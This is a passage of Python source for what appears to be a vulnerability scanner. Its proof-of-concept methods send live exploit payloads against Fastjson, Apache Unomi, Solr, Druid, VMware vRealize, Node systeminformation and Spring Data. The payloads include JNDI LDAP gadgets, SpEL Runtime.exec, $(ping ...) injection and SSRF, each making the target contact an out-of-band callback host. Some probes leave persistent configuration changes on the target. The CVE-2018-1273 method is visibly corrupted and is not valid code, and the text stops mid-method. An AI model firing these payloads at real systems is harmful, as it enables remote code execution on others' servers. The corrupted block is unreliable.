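 def fastjson_1224_poc(self):
     """Probe for the Fastjson <= 1.2.24 deserialization RCE (CVE-2017-18349).

     POSTs a JSON body whose ``@type`` is ``com.sun.rowset.JdbcRowSetImpl`` and whose
     ``dataSourceName`` is an LDAP URL on the out-of-band callback host returned by
     ``dns_request()``. A parser that honours ``@type`` follows that JNDI reference
     and so resolves the hostname; ``dns_result()`` reports whether the callback saw
     the lookup. Nothing is served at ``//Exploit`` by this code -- the DNS hit alone
     decides the verdict, so a hit means "resolves attacker-supplied JNDI
     references", not a completed exploit.

     The HTTP exchange is best-effort: a timeout or reset does not abort the DNS
     check, since a target that follows the reference may never answer cleanly.
     Results are written to ``self.vul_info`` and printed through ``verify``;
     nothing is returned and no exception escapes.

     Active probe: it makes the target contact an external host. Authorised
     targets only.
     """
     self.threadLock.acquire()
     try:
         self.vul_info["prt_name"] = "Fastjson: 1.2.24"
         self.vul_info["prt_resu"] = "null"
         self.vul_info["prt_info"] = "null"
         self.vul_info["vul_payd"] = "null"
         self.vul_info["vul_urls"] = self.url
         self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
         self.vul_info["vul_numb"] = "CVE-2017-18349"
         self.vul_info["vul_apps"] = "Fastjson"
         self.vul_info["vul_date"] = "2017-03-15"
         self.vul_info["vul_vers"] = "<= 1.2.24"
         self.vul_info["vul_risk"] = "high"
         self.vul_info["vul_type"] = "远程代码执行"
         self.vul_info["vul_data"] = "null"
         self.vul_info["vul_desc"] = "Fastjson中的parseObject允许远程攻击者通过精心制作的JSON请求执行任意代码"
         self.vul_info["cre_date"] = "2021-01-20"
         self.vul_info["cre_auth"] = "zhzyker"
         headers = {
             'User-Agent': self.ua,
             'Content-Type': "application/json",
             'Connection': 'close'
         }
         dns = dns_request()
         ldap_url = "ldap://" + dns + "//Exploit"
         data = json.dumps({
             "b": {
                 "@type": "com.sun.rowset.JdbcRowSetImpl",
                 "dataSourceName": ldap_url,
                 "autoCommit": True
             }
         })
         try:
             try:
                 request = requests.post(self.url,
                                         data=data,
                                         headers=headers,
                                         timeout=self.timeout,
                                         verify=False)
                 self.vul_info["vul_data"] = dump.dump_all(request).decode(
                     'utf-8', 'ignore')
             except requests.exceptions.RequestException:
                 # Deliberate swallow, narrowed from a bare ``except``: the DNS
                 # callback below is the authoritative signal even when the HTTP
                 # side stalled or reset.
                 pass
             if dns_result(dns):
                 # Record the URL actually sent; the original appended a stray
                 # "] " copied from the display string below.
                 self.vul_info["vul_payd"] = ldap_url
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["prt_info"] = "[dns] [payload: " + ldap_url + "] "
             verify.scan_print(self.vul_info)
         except Exception:
             # The original's Timeout/ConnectionError branches were unreachable
             # (the inner handler already catches both); one reporter is enough.
             verify.error_print(self.vul_info["prt_name"])
     finally:
         # Release even if dns_result()/scan_print() raise; otherwise every
         # sibling PoC waiting on this lock deadlocks.
         self.threadLock.release()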
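 def fastjson(self, webapps_identify, url):
     """Fingerprint Fastjson on ``url``; on a match append "fastjson" to ``webapps_identify``.

     Signals, checked in order after one POST of a truncated JSON document:
       1. the body contains ``nested exception is com.alibaba.fastjson.JSONException:``
          and the response Content-Type is exactly ``application/json``;
       2. otherwise the Content-Type merely contains ``application/json`` -- a weak
          heuristic that also tags unrelated JSON APIs;
       3. otherwise four out-of-band ``@type`` payloads (``java.net.Inet4Address`` /
          ``java.net.URL`` pointing at the callback host from ``dns_request()``) are
          sent, and a lookup seen by ``dns_result()`` appends "fastjson" twice, the
          second entry carrying the callback name.
     Identification is best-effort: every network or parsing error is swallowed and
     the function never raises. ``Identify.identify_prt`` is called first (a
     progress hook, by name).
     """
     name = "Fastjson"
     Identify.identify_prt(name)
     dns = dns_request()
     oob_payloads = (
         '{"e":{"@type":"java.net.Inet4Address","val":"%s"}}' % dns,
         '{"@type":"java.net.Inet4Address","val":"%s"}' % dns,
         '{{"@type":"java.net.URL","val":"http://%s"}:"x"}' % dns,
         '{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"%s"}}""}' % dns,
     )
     error_probe = '{"a":"'
     headers = {'User-Agent': self.ua, 'Content-Type': "application/json", 'Connection': 'close'}
     try:
         try:
             request = requests.post(url, data=error_probe, headers=headers, timeout=self.timeout, verify=False)
         except requests.exceptions.RequestException:
             # Nothing to inspect. (The original fell through to a NameError on
             # ``request`` that the outer handler then hid.)
             return
         # A missing Content-Type used to raise KeyError and abort before the
         # out-of-band probes were ever sent; treat it as "no hint" instead.
         content_type = request.headers.get('Content-Type', '')
         if r"nested exception is com.alibaba.fastjson.JSONException:" in request.text:
             if r"application/json" == content_type:
                 webapps_identify.append("fastjson")
         elif r"application/json" in content_type:
             webapps_identify.append("fastjson")
         else:
             for payload in oob_payloads:
                 try:
                     requests.post(url, data=payload, headers=headers, timeout=self.timeout, verify=False)
                 except requests.exceptions.RequestException:
                     # One stalled probe must not stop the remaining ones.
                     continue
             if dns_result(dns):
                 webapps_identify.append("fastjson")
                 webapps_identify.append("fastjson [" + dns + "]")
     except Exception:
         pass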
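 def cve_2020_13942_poc(self):
     """Probe Apache Unomi (< 1.5.2) for CVE-2020-13942, an MVEL/OGNL expression RCE.

     POSTs ``self.payload_cve_2020_13942`` (defined elsewhere; contains the marker
     ``RECOMMAND``) to ``<url>/context.json`` with the marker replaced by
     ``ping <callback-host>``. A DNS lookup of that host seen by ``dns_result()``
     shows the expression was evaluated and the command ran. Without a hit, a
     response whose ``trackedConditions[0].parameterValues.pagePath`` contains
     ``/tracker/`` is reported as ``PoC_MaYbE`` -- that only shows the endpoint
     answered like Unomi, not that the injection worked.

     Results go to ``self.vul_info`` / ``verify``; nothing is returned. Request
     state is kept in locals: the original wrote ``self.payload`` and
     ``self.headers``, clobbering instance attributes shared with other methods.
     Active probe that runs ``ping`` on the target -- authorised use only.
     """
     self.threadLock.acquire()
     try:
         self.vul_info["prt_name"] = "Apache Unomi: CVE-2020-13942"
         self.vul_info["prt_resu"] = "null"
         self.vul_info["prt_info"] = "null"
         self.vul_info["vul_urls"] = self.url
         self.vul_info["vul_payd"] = self.payload_cve_2020_13942.replace(
             "RECOMMAND", "whoami")
         self.vul_info["vul_name"] = "Apache Unomi remote code execution"
         self.vul_info["vul_numb"] = "CVE-2020-13942"
         self.vul_info["vul_apps"] = "Unomi"
         self.vul_info["vul_date"] = "2020-11-23"
         self.vul_info["vul_vers"] = "< 1.5.2"
         self.vul_info["vul_risk"] = "high"
         self.vul_info["vul_type"] = "远程代码执行"
         self.vul_info["vul_data"] = "null"
         self.vul_info["vul_desc"] = "攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码," \
                                     "漏洞对应编号为CVE-2020-11975,而CVE-2020-13942漏洞是对CVE-2020-11975漏洞的补丁绕过," \
                                     "攻击者绕过补丁检测的黑名单,发送恶意请求,在服务器执行任意代码。"
         self.vul_info["cre_date"] = "2021-01-28"
         self.vul_info["cre_auth"] = "zhzyker"
         dns = dns_request()
         cmd = "ping " + dns
         payload = self.payload_cve_2020_13942.replace("RECOMMAND", cmd)
         headers = {
             'User-Agent': self.ua,
             'Accept': '*/*',
             'Connection': 'close',
             'Content-Type': 'application/json'
         }
         try:
             req = requests.post(self.url + "/context.json",
                                 data=payload,
                                 headers=headers,
                                 timeout=self.timeout,
                                 verify=False)
             if dns_result(dns):
                 self.vul_info["vul_data"] = dump.dump_all(req).decode(
                     'utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["prt_info"] = "[dns] [cmd:" + cmd + "]"
             else:
                 # Fallback fingerprint. A non-Unomi answer (HTML, other JSON)
                 # used to raise here and be reported as an error instead of
                 # as "not vulnerable".
                 try:
                     page_path = list(json.loads(req.text)["trackedConditions"])[0]["parameterValues"]["pagePath"]
                 except (ValueError, KeyError, IndexError, TypeError):
                     page_path = ""
                 if isinstance(page_path, str) and r"/tracker/" in page_path:
                     self.vul_info["vul_data"] = dump.dump_all(req).decode(
                         'utf-8', 'ignore')
                     self.vul_info["prt_resu"] = "PoC_MaYbE"
                     self.vul_info["prt_info"] = "[maybe]"
             verify.scan_print(self.vul_info)
         except requests.exceptions.Timeout:
             verify.timeout_print(self.vul_info["prt_name"])
         except requests.exceptions.ConnectionError:
             verify.connection_print(self.vul_info["prt_name"])
         except Exception:
             verify.error_print(self.vul_info["prt_name"])
     finally:
         # Release on every path; the original leaked the lock if scan_print()
         # or dns_result() raised, stalling all other PoC threads.
         self.threadLock.release()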
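 def cve_2021_27905_poc(self):
     """Probe Apache Solr for CVE-2021-27905 (ReplicationHandler ``masterUrl`` SSRF).

     Lists cores via ``/solr/admin/cores?indexInfo=false&wt=json``, takes the first
     core name, then requests that core's ``/replication?command=fetchindex`` with a
     ``masterUrl`` on the out-of-band callback host from ``dns_request()``. A DNS
     lookup of that host seen by ``dns_result()`` shows the server tried to reach
     the attacker-chosen URL. Results go to ``self.vul_info`` / ``verify``; nothing
     is returned.

     The original also sent ``httpBasicAuthUser``/``httpBasicAuthPassword`` query
     parameters; their values were redacted in this copy, and a DNS-only check does
     not need them, so they are omitted. The probe makes the target fetch from an
     external host -- authorised use only.
     """
     self.threadLock.acquire()
     try:
         self.vul_info["prt_name"] = "Apache Solr: CVE-2021-27905"
         self.vul_info["prt_resu"] = "null"
         self.vul_info["prt_info"] = "null"
         self.vul_info["vul_urls"] = self.url
         self.vul_info["vul_payd"] = "null"
         self.vul_info["vul_name"] = "Apache Solr Replication handler SSRF"
         self.vul_info["vul_numb"] = "CVE-2021-27905"
         self.vul_info["vul_apps"] = "Solr"
         self.vul_info["vul_date"] = "2021-04-14"
         self.vul_info["vul_vers"] = "7.0.0-7.7.3, 8.0.0-8.8.1"
         self.vul_info["vul_risk"] = "high"
         self.vul_info["vul_type"] = "SSRF"
         self.vul_info["vul_data"] = "null"
         self.vul_info[
             "vul_desc"] = "Apache Solr是一个开源搜索服务引擎,Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。漏洞产生在 ReplicationHandler 中的 masterUrl 参数( leaderUrl 参数)可指派另一个 Solr 核心上的 ReplicationHandler 讲索引数据复制到本地核心上。成功利用此漏洞可造成服务端请求伪造漏洞。"
         self.vul_info["cre_auth"] = "zhzyker"
         dns = dns_request()
         url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
         try:
             request = requests.get(url_core,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
             core_name = None
             try:
                 core_name = list(json.loads(request.text)["status"])[0]
             except (ValueError, KeyError, IndexError, TypeError):
                 pass
             if core_name is None:
                 # No core to target. The original crashed in str.replace(None)
                 # and was reported as an error; report "not vulnerable" instead.
                 verify.scan_print(self.vul_info)
                 return
             payload = ("/solr/" + core_name + "/replication?command=fetchindex"
                        "&masterUrl=http://" + dns + "/&wt=json")
             # Kept from the original: urljoin() replaces the path of self.url,
             # whereas url_core above is plain concatenation, so a self.url with
             # a path prefix is treated differently by the two requests.
             url_ssrf = urljoin(self.url, payload)
             r = requests.get(url_ssrf,
                              headers=self.headers,
                              timeout=self.timeout,
                              verify=False)
             # Truth test, as every other PoC does. The original wrote
             # ``dns in dns_result(dns)``, which only works if dns_result()
             # returns text rather than a bool.
             if dns_result(dns):
                 self.vul_info["vul_payd"] = url_ssrf
                 self.vul_info["vul_data"] = dump.dump_all(r).decode(
                     'utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info[
                     "prt_info"] = "[ssrf] [dns] [corename: " + self.url + "/solr/" + core_name + " ]"
             verify.scan_print(self.vul_info)
         except requests.exceptions.Timeout:
             verify.timeout_print(self.vul_info["prt_name"])
         except requests.exceptions.ConnectionError:
             verify.connection_print(self.vul_info["prt_name"])
         except Exception:
             verify.error_print(self.vul_info["prt_name"])
     finally:
         # Release on every path (the original leaked the lock on an unexpected
         # exception from scan_print()/dns_result()).
         self.threadLock.release()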
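 def fastjson_1262_poc(self):
     """Probe for the Fastjson <= 1.2.62 autoType deserialization RCE (no CVE recorded).

     POSTs a JSON body with ``@type`` ``org.apache.xbean.propertyeditor.JndiConverter``
     and ``AsText`` set to an LDAP URL on the out-of-band callback host from
     ``dns_request()``. A target that resolves that JNDI reference performs a DNS
     lookup of the host; ``dns_result()`` reports whether the callback saw it. No
     class is served at the URL -- the DNS hit alone decides the verdict.

     The HTTP exchange is best-effort (a stall or reset does not abort the DNS
     check). Results go to ``self.vul_info`` / ``verify``; nothing is returned and
     no exception escapes. Active probe -- authorised targets only.
     """
     self.threadLock.acquire()
     try:
         self.vul_info["prt_name"] = "Fastjson: 1.2.62"
         self.vul_info["prt_resu"] = "null"
         self.vul_info["prt_info"] = "null"
         self.vul_info["vul_payd"] = "null"
         self.vul_info["vul_urls"] = self.url
         self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
         self.vul_info["vul_numb"] = "null"
         self.vul_info["vul_apps"] = "Fastjson"
         self.vul_info["vul_date"] = "2019-10-07"
         self.vul_info["vul_vers"] = "<= 1.2.62"
         self.vul_info["vul_risk"] = "high"
         self.vul_info["vul_type"] = "远程代码执行"
         self.vul_info["vul_data"] = "null"
         self.vul_info["vul_desc"] = "官方暂未发布针对此漏洞的修复版本,开启了autoType功能的受影响用户可通过关闭autoType来规避风险" \
                                     "(autoType功能默认关闭),另建议将JDK升级到最新版本。"
         self.vul_info["cre_date"] = "2021-01-21"
         self.vul_info["cre_auth"] = "zhzyker"
         headers = {'User-Agent': self.ua, 'Content-Type': "application/json"}
         dns = dns_request()
         # The URL that is actually sent. The original reported "//Exploit"
         # (capital E) while sending "//exploit"; one variable keeps them equal.
         ldap_url = "ldap://" + dns + "//exploit"
         data = json.dumps({
             "@type": "org.apache.xbean.propertyeditor.JndiConverter",
             "AsText": ldap_url
         })
         try:
             try:
                 request = requests.post(self.url,
                                         data=data,
                                         headers=headers,
                                         timeout=self.timeout,
                                         verify=False)
                 self.vul_info["vul_data"] = dump.dump_all(request).decode(
                     'utf-8', 'ignore')
             except requests.exceptions.RequestException:
                 # Deliberate swallow (narrowed from a bare ``except``): the DNS
                 # callback is the real signal even if the HTTP side stalled.
                 pass
             if dns_result(dns):
                 self.vul_info["vul_payd"] = ldap_url
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["prt_info"] = "[dns] [payload: " + ldap_url + "] "
             verify.scan_print(self.vul_info)
         except Exception:
             # The original Timeout/ConnectionError branches were dead code
             # (already swallowed above); a single reporter remains.
             verify.error_print(self.vul_info["prt_name"])
     finally:
         # Never leave the lock held -- sibling PoC threads block on it.
         self.threadLock.release()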
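 def cve_2021_25646_poc(self):
     """Probe Apache Druid (< 0.20.1) for CVE-2021-25646, JavaScript-injection RCE.

     POSTs ``self.payload_cve_2021_25646`` (defined elsewhere; contains the marker
     ``RECOMMAND``) to ``/druid/indexer/v1/sampler`` with the marker replaced by
     ``ping <callback-host>``. A DNS lookup of that host seen by ``dns_result()``
     shows the command executed. There is no secondary heuristic: no hit means
     the result stays ``null``.

     Results go to ``self.vul_info`` / ``verify``; nothing is returned and no
     exception escapes. Active probe that runs ``ping`` on the target -- use
     against authorised systems only.
     """
     self.threadLock.acquire()
     try:
         self.vul_info["prt_name"] = "Apache Druid: CVE-2021-25646"
         self.vul_info["prt_resu"] = "null"
         self.vul_info["prt_info"] = "null"
         self.vul_info["vul_urls"] = self.url
         self.vul_info["vul_payd"] = "null"
         self.vul_info["vul_name"] = "Apache Druid 远程代码执行漏洞"
         self.vul_info["vul_numb"] = "CVE-2021-25646"
         self.vul_info["vul_apps"] = "Druid"
         self.vul_info["vul_date"] = "2021-02-01"
         self.vul_info["vul_vers"] = "< 0.20.1"
         self.vul_info["vul_risk"] = "high"
         self.vul_info["vul_type"] = "远程代码执行漏洞"
         self.vul_info["vul_data"] = "null"
         self.vul_info["vul_desc"] = "Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。" \
                                     "此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中," \
                                     "经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。" \
                                     "攻击者可直接构造恶意请求执行任意代码,控制服务器。"
         self.vul_info["cre_date"] = "2021-02-03"
         self.vul_info["cre_auth"] = "zhzyker"
         url = urljoin(self.url, "/druid/indexer/v1/sampler")
         headers = {
             'Content-Type': 'application/json',
             'User-Agent': self.ua,
             'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
             'Connection': 'keep-alive'
         }
         dns = dns_request()
         cmd = "ping " + dns
         data = self.payload_cve_2021_25646.replace("RECOMMAND", cmd)
         try:
             request = requests.post(url,
                                     data=data,
                                     headers=headers,
                                     timeout=self.timeout,
                                     verify=False)
             if dns_result(dns):
                 self.vul_info["vul_data"] = dump.dump_all(request).decode(
                     'utf-8', 'ignore')
                 self.vul_info["vul_payd"] = data
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["prt_info"] = "[dns] [rce] [cmd: " + cmd + "]"
             verify.scan_print(self.vul_info)
         except requests.exceptions.Timeout:
             verify.timeout_print(self.vul_info["prt_name"])
         except requests.exceptions.ConnectionError:
             verify.connection_print(self.vul_info["prt_name"])
         except Exception:
             verify.error_print(self.vul_info["prt_name"])
     finally:
         # Release on every path; the original leaked the lock if scan_print()
         # or dns_result() raised.
         self.threadLock.release()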
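 def cve_2021_21975_poc(self):
     """Probe VMware vRealize Operations Manager (<= 8.3.0) for CVE-2021-21975 (SSRF).

     POSTs a JSON array holding the out-of-band callback host from
     ``dns_request()`` to ``/casa/nodes/thumbprints``. A DNS lookup of that host
     seen by ``dns_result()`` shows the server connected out to the supplied
     name. Results go to ``self.vul_info`` / ``verify``; nothing is returned and no
     exception escapes.

     ``vul_numb`` is CVE-2021-21975, matching ``prt_name``/``vul_name``; the
     original recorded CVE-2021-21972 (a different product's bug) here.
     """
     self.threadLock.acquire()
     try:
         self.vul_info[
             "prt_name"] = "VMware vRealize Operations Manager: CVE-2021-21975"
         self.vul_info["prt_resu"] = "null"
         self.vul_info["prt_info"] = "null"
         self.vul_info["vul_urls"] = self.url
         self.vul_info["vul_payd"] = "null"
         self.vul_info[
             "vul_name"] = "VMware vRealize Operations Manager API SSRF"
         self.vul_info["vul_numb"] = "CVE-2021-21975"
         self.vul_info["vul_apps"] = "Vmware"
         self.vul_info["vul_date"] = "2021-03-31"
         self.vul_info["vul_vers"] = "<= 8.3.0"
         self.vul_info["vul_risk"] = "high"
         self.vul_info["vul_type"] = "SSRF"
         self.vul_info["vul_data"] = "null"
         self.vul_info[
             "vul_desc"] = "攻击者通过访问vRealize Operations Manager API传递特定的参数到服务器端进行请求伪造攻击"
         self.vul_info["cre_date"] = "2021-04-01"
         self.vul_info["cre_auth"] = "zhzyker"
         try:
             headers = {
                 "User-Agent": self.ua,
                 "Content-Type": "application/json;charset=UTF-8"
             }
             dns = dns_request()
             data = '["' + dns + '"]'
             url = urljoin(self.url, "/casa/nodes/thumbprints")
             res = requests.post(url,
                                 data=data,
                                 headers=headers,
                                 timeout=self.timeout,
                                 verify=False)
             if dns_result(dns):
                 self.vul_info["vul_data"] = dump.dump_all(res).decode(
                     'utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["vul_payd"] = data
                 self.vul_info["prt_info"] = "[ssrf] [dns:" + dns + " ]"
             verify.scan_print(self.vul_info)
         except requests.exceptions.Timeout:
             verify.timeout_print(self.vul_info["prt_name"])
         except requests.exceptions.ConnectionError:
             verify.connection_print(self.vul_info["prt_name"])
         except Exception:
             verify.error_print(self.vul_info["prt_name"])
     finally:
         # Release on every path (the original leaked the lock on an exception
         # raised inside scan_print()/dns_result()).
         self.threadLock.release()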
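    def cve_2021_21315_poc(self):
        """Probe for CVE-2021-21315, command injection in the Node.js ``systeminformation`` package (< 5.3.1).

        GETs ``/api/getServices?name[]=$(ping <callback-host>)``; a service name
        containing ``$(...)`` reaches a shell on a vulnerable host, and a DNS lookup
        of the callback host seen by ``dns_result()`` shows the command ran. The
        request itself is best-effort -- a stall or reset does not abort the DNS
        check. Results go to ``self.vul_info`` / ``verify``; nothing is returned.

        Uses ``self.timeout`` like every other PoC; the original hard-coded a
        3-second timeout here. Active probe that runs ``ping`` on the target --
        authorised use only.
        """
        self.threadLock.acquire()
        try:
            self.vul_info["prt_name"] = "Node.JS: CVE-2021-21315"
            self.vul_info["prt_resu"] = "null"
            self.vul_info["prt_info"] = "null"
            self.vul_info["vul_urls"] = self.url
            self.vul_info["vul_payd"] = "null"
            self.vul_info["vul_name"] = "Node.JS Command Injection"
            self.vul_info["vul_numb"] = "CVE-2021-21315"
            self.vul_info["vul_apps"] = "Node.JS"
            self.vul_info["vul_date"] = "2021-02-25"
            self.vul_info["vul_vers"] = "Systeminformation < 5.3.1"
            self.vul_info["vul_risk"] = "high"
            self.vul_info["vul_type"] = "Command Injection"
            self.vul_info["vul_data"] = "null"
            self.vul_info["vul_desc"] = "CVE-2021-21315 Node.JS OS sanitize service Parameters Command Injection"
            self.vul_info["cre_date"] = "2021-03-04"
            self.vul_info["cre_auth"] = "zhzyker"
            headers = {
                "User-agent": self.ua,
                "Connection": "close"
            }
            dns = dns_request()
            cmd = "ping%20" + dns
            payload = "/api/getServices?name[]=$(RECOMMAND)".replace("RECOMMAND", cmd)
            url = self.url + payload
            try:
                try:
                    req = requests.get(url, headers=headers, timeout=self.timeout, verify=False)
                    raw = dump.dump_all(req).decode('utf-8', 'ignore')
                except requests.exceptions.RequestException:
                    # Deliberate swallow (narrowed from a bare ``except``): the
                    # DNS callback is the real signal even if the HTTP side stalled.
                    raw = "null"
                if dns_result(dns):
                    self.vul_info["vul_data"] = raw
                    self.vul_info["prt_resu"] = "PoCSuCCeSS"
                    self.vul_info["vul_payd"] = payload
                    self.vul_info["prt_info"] = "[dns] [payload:" + url + " ]"
                verify.scan_print(self.vul_info)
            except Exception:
                # The Timeout/ConnectionError branches of the original could not
                # be reached (swallowed above); one reporter remains.
                verify.error_print(self.vul_info["prt_name"])
        finally:
            # Release on every path; the original leaked the lock if scan_print()
            # or dns_result() raised.
            self.threadLock.release()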
 def cve_2018_1273_poc(self):
     """Probe Spring Data Commons (1.13-1.13.10, 2.0-2.0.5) for CVE-2018-1273, SpEL injection.

     Builds a form payload whose ``username[...]`` key carries a SpEL expression
     that calls ``Runtime.exec("ping <callback-host>")``; a DNS lookup of the
     callback host seen by ``dns_result()`` is the success signal, and results are
     written to ``self.vul_info`` and printed through ``verify``.

     NOTE(review): this copy of the source is corrupted. The line that builds
     ``payload`` was run through a credential scrubber (``'******'``) which also
     swallowed the lines between it and the ``"PoCSuCCeSS"`` assignment: the
     request headers, the POST to the target, the ``dns_result()`` check and the
     start of the ``dump.dump_all(...).decode(`` call are missing, so this block is
     not valid Python as shown. Restore it from the upstream repository rather than
     from here; the sibling PoCs show the intended shape (POST, then
     ``if dns_result(md):``). Like its siblings, this method also only releases
     ``self.threadLock`` on the non-raising path.
     """
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Spring Data: CVE-2018-1273"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "Spring Data Commons 远程命令执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2018-1273"
     self.vul_info["vul_apps"] = "Spring"
     self.vul_info["vul_date"] = "2018-04-11"
     self.vul_info["vul_vers"] = "1.13 - 1.13.10, 2.0 - 2.0.5"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程命令执行漏洞"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "Spring Data Commons组件中存在远程代码执行漏洞," \
                                 "攻击者可构造包含有恶意代码的SPEL表达式实现远程代码攻击,直接获取服务器控制权限。"
     self.vul_info["cre_date"] = "2021-01-26"
     self.vul_info["cre_auth"] = "zhzyker"
     md = dns_request()
     # ``ping <callback>`` is the command the SpEL expression is meant to run.
     cmd = "ping " + md
     # NOTE(review): garbled line -- everything from the scrubbed password value
     # up to the ``'utf-8', 'ignore')`` fragment is missing (see docstring).
     payload = 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("' + cmd + '")]=&password=&repeatedPassword='******'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["vul_payd"] = payload
             self.vul_info["prt_info"] = "[dns] [rce] [payload: " + payload + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
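 def cve_2017_12629_poc(self):
     """Probe Apache Solr (< 7.1.0) for CVE-2017-12629, RCE via the config API.

     Lists cores via ``/solr/admin/cores?indexInfo=false&wt=json``, takes the
     first core name and POSTs ``self.payload_cve_2017_12629`` (defined elsewhere;
     markers ``RECOMMAND`` and ``new_core``) to that core's ``/config`` endpoint
     with the command set to ``ping <callback-host>``. A DNS lookup of that host
     seen by ``dns_result()`` is ``PoCSuCCeSS``. Without a hit, a 200 on the core
     listing plus a discovered core name is reported as ``PoC_MaYbE`` -- that only
     says "this is a Solr with a core", not that the listener fired.

     Per ``vul_desc`` the payload registers a listener in the core's config; that
     is a persistent change on the target which this code never removes. The
     probe also forces HTTP/1.0 by patching ``http.client`` process-wide (there is
     no per-request switch in requests/urllib3); the original never restored it,
     silently changing every later request in the process, other threads
     included. It is restored on exit, but remains global while this runs.

     Results go to ``self.vul_info`` / ``verify``; nothing is returned.
     Authorised targets only.
     """
     self.threadLock.acquire()
     prev_http_vsn = http.client.HTTPConnection._http_vsn_str
     http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
     try:
         self.vul_info["prt_name"] = "Apache Solr: CVE-2017-12629"
         self.vul_info["prt_resu"] = "null"
         self.vul_info["prt_info"] = "null"
         self.vul_info["vul_payd"] = self.payload_cve_2017_12629.replace(
             "RECOMMAND", "whoami")
         self.vul_info["vul_urls"] = self.url
         self.vul_info["vul_name"] = "Apache Solr 远程代码执行漏洞"
         self.vul_info["vul_numb"] = "CVE-2017-12629"
         self.vul_info["vul_apps"] = "Solr"
         self.vul_info["vul_date"] = "2017-10-14"
         self.vul_info["vul_vers"] = "< 7.1.0"
         self.vul_info["vul_risk"] = "high"
         self.vul_info["vul_type"] = "Remote Code Execution"
         self.vul_info["vul_data"] = "null"
         self.vul_info["vul_desc"] = "Apache Solr 是Apache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法" \
                                     "(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令。"
         self.vul_info["cre_auth"] = "zhzyker"
         new_core = random_md5()
         dns = dns_request()
         cmd = "ping " + dns
         config_payload = self.payload_cve_2017_12629.replace(
             "RECOMMAND", cmd).replace("new_core", new_core)
         url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
         headers = {
             'Accept': "*/*",
             'User-Agent': self.ua,
             'Content-Type': "application/json"
         }
         try:
             request = requests.get(url_core,
                                    headers=headers,
                                    timeout=self.timeout,
                                    verify=False)
             core_name = None
             try:
                 core_name = list(json.loads(request.text)["status"])[0]
             except (ValueError, KeyError, IndexError, TypeError):
                 pass
             if core_name is None:
                 # Nothing to target; the original posted to "/solr/null/config".
                 verify.scan_print(self.vul_info)
                 return
             req = requests.post(self.url + "/solr/" + str(core_name) + "/config",
                                 data=config_payload,
                                 headers=headers,
                                 timeout=self.timeout,
                                 verify=False)
             if dns_result(dns):
                 self.vul_info["vul_data"] = dump.dump_all(req).decode(
                     'utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info[
                     "prt_info"] = "[dns] [newcore: " + new_core + "] "
             elif request.status_code == 200:
                 # Weak heuristic kept from the original: core listing worked
                 # and a core exists, so the config endpoint was at least reachable.
                 self.vul_info["vul_data"] = dump.dump_all(req).decode(
                     'utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoC_MaYbE"
                 self.vul_info[
                     "prt_info"] = "[maybe] [newcore: " + new_core + "] "
             verify.scan_print(self.vul_info)
         except requests.exceptions.Timeout:
             verify.timeout_print(self.vul_info["prt_name"])
         except requests.exceptions.ConnectionError:
             verify.connection_print(self.vul_info["prt_name"])
         except Exception:
             verify.error_print(self.vul_info["prt_name"])
     finally:
         # Undo the process-wide HTTP-version patch and release the lock on
         # every path (the original did neither when something raised).
         http.client.HTTPConnection._http_vsn_str = prev_http_vsn
         self.threadLock.release()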
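 def cve_2019_17558_poc(self):
     """Probe Apache Solr (5.0.0-8.3.1) for CVE-2019-17558, Velocity template RCE.

     Lists cores via ``/solr/admin/cores?indexInfo=false&wt=json``, takes the
     first core name, then (1) POSTs a config-API body to that core's ``/config``
     that registers ``solr.VelocityResponseWriter`` with
     ``params.resource.loader.enabled`` set to ``"true"``, and (2) GETs
     ``self.payload_cve_2019_17558`` (defined elsewhere; marker ``RECOMMAND``)
     against the core with the command set to ``ping <callback-host>``. A DNS
     lookup of that host seen by ``dns_result()`` is ``PoCSuCCeSS``; otherwise a
     discovered core name alone is reported as ``PoC_MaYbE``.

     Step (1) is a persistent configuration change on the target: it is the very
     setting the template injection relies on, and this code never reverts it --
     the core is left accepting templates from request parameters after the scan.
     Results go to ``self.vul_info`` / ``verify``; nothing is returned. Authorised
     targets only.
     """
     self.threadLock.acquire()
     try:
         self.vul_info["prt_name"] = "Apache Solr: CVE-2019-17558"
         self.vul_info["prt_resu"] = "null"
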